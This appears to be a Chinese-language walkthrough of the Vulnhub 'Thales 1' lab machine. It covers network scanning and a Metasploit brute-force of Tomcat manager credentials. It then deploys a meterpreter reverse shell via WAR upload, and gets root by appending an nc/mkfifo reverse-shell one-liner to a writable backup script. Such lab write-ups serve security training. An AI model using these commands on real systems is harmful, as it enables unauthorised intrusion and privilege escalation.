Thales 1

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Thales_1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:3e:7d:ac      2     120  PCS Systemtechnik GmbH                                                    
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.128  08:00:27:3f:06:ce      1      60  PCS Systemtechnik GmbH    

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.128

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Thales_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.128 -oN nmap_full_scan
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-10 23:46 EST
Nmap scan report for bogon (192.168.56.128)
Host is up (0.00087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8c:19:ab:91:72:a5:71:d8:6d:75:1d:8f:65:df:e1:32 (RSA)
|   256 90:6e:a0:ee:d5:29:6c:b9:7b:05:db:c6:82:5c:19:bf (ECDSA)
|_  256 54:4d:7b:e8:f9:7f:21:34:3e:ed:0f:d9:fe:93:bf:00 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.52
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.52
MAC Address: 08:00:27:3F:06:CE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

NMAP扫描结果表明目标主机有2个开放端口。

获得Shell

浏览器访问8080端口，返回Tomcat默认页面

┌──(kali㉿kali)-[~/Vulnhub/Thales_1]
┌──(kali㉿kali)-[~/Vulnhub/Thales_1]
└─$ nikto -h http://192.168.56.128:8080 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.128
+ Target Hostname:    192.168.56.128
+ Target Port:        8080
+ Start Time:         2022-12-10 23:49:55 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8221 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2022-12-10 23:50:16 (GMT-5) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

发现了manager以及host-manager目录

访问manager，弹出用户认证窗口（basic 认证），访问Host-manager，返回结果是相同的。试了一下弱密码，没有成功，可利用Metasploit中tomcat密码破解模块：

msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.128:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.56.128:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[+] 192.168.56.128:8080 - Login Successful: tomcat:role1
[-] 192.168.56.128:8080 - LOGIN FAILED: manager:admin (Incorrect)

[-] 192.168.56.128:8080 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.128:8080 - LOGIN FAILED: root:toor (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/tomcat_mgr_login) > 

破解出/manager的用户名与密码：

username: tomcat

password: role1

msf6 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > show options 

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usin
                                            g-Metasploit
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST  192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/http/tomcat_mgr_upload) > set LPORT  5555
LPORT => 5555
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.56.128
RHOSTS => 192.168.56.128
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
  
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword role1
HttpPassword => role1
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying hX0h...
[*] Executing hX0h...
[*] Undeploying hX0h ...
[*] Sending stage (58829 bytes) to 192.168.56.128
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.128:54354) at 2022-12-11 00:22:20 -0500

meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=999(tomcat) gid=999(tomcat) groups=999(tomcat)

至此可以得到目标主机的shell

uid=999(tomcat) gid=999(tomcat) groups=999(tomcat)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@miletus:/$ ls
ls
bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swap.img  usr  vmlinuz.old
tomcat@miletus:/$ cd /home
cd /home
tomcat@miletus:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K Aug 15  2021 .
drwxr-xr-x 24 root   root   4.0K Oct 14  2021 ..
drwxr-xr-x  6 thales thales 4.0K Oct 14  2021 thales
tomcat@miletus:/home$ cd thales
cd thales
tomcat@miletus:/home/thales$ ls -alh
ls -alh
total 52K
drwxr-xr-x 6 thales thales 4.0K Oct 14  2021 .
drwxr-xr-x 3 root   root   4.0K Aug 15  2021 ..
-rw------- 1 thales thales  457 Oct 14  2021 .bash_history
-rw-r--r-- 1 thales thales  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 thales thales 3.7K Apr  4  2018 .bashrc
drwx------ 2 thales thales 4.0K Aug 15  2021 .cache
drwx------ 3 thales thales 4.0K Aug 15  2021 .gnupg
drwxrwxr-x 3 thales thales 4.0K Aug 15  2021 .local
-rw-r--r-- 1 root   root    107 Oct 14  2021 notes.txt
-rw-r--r-- 1 thales thales  807 Apr  4  2018 .profile
-rw-r--r-- 1 root   root     66 Aug 15  2021 .selected_editor
drwxrwxrwx 2 thales thales 4.0K Aug 16  2021 .ssh
-rw-r--r-- 1 thales thales    0 Oct 14  2021 .sudo_as_admin_successful
-rw------- 1 thales thales   33 Aug 15  2021 user.txt
tomcat@miletus:/home/thales$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
tomcat@miletus:/home/thales$ cat notes.txt
cat notes.txt
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
tomcat@miletus:/home/thales$ 

提权

根据notes.txt文件知道，有个备份脚本，该脚本应该会被周期性执行：

tomcat@miletus:/home/thales$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 6666 >/tmp/f' >> /usr/local/bin/backup.sh
<68.56.206 6666 >/tmp/f' >> /usr/local/bin/backup.sh
tomcat@miletus:/home/thales$ 

──(kali㉿kali)-[~/Vulnhub/Thales_1]
└─$ sudo nc -nlvp 6666                                         
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.128] 47602
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
3a1c85bebf8833b0ecae900fb8598b17
#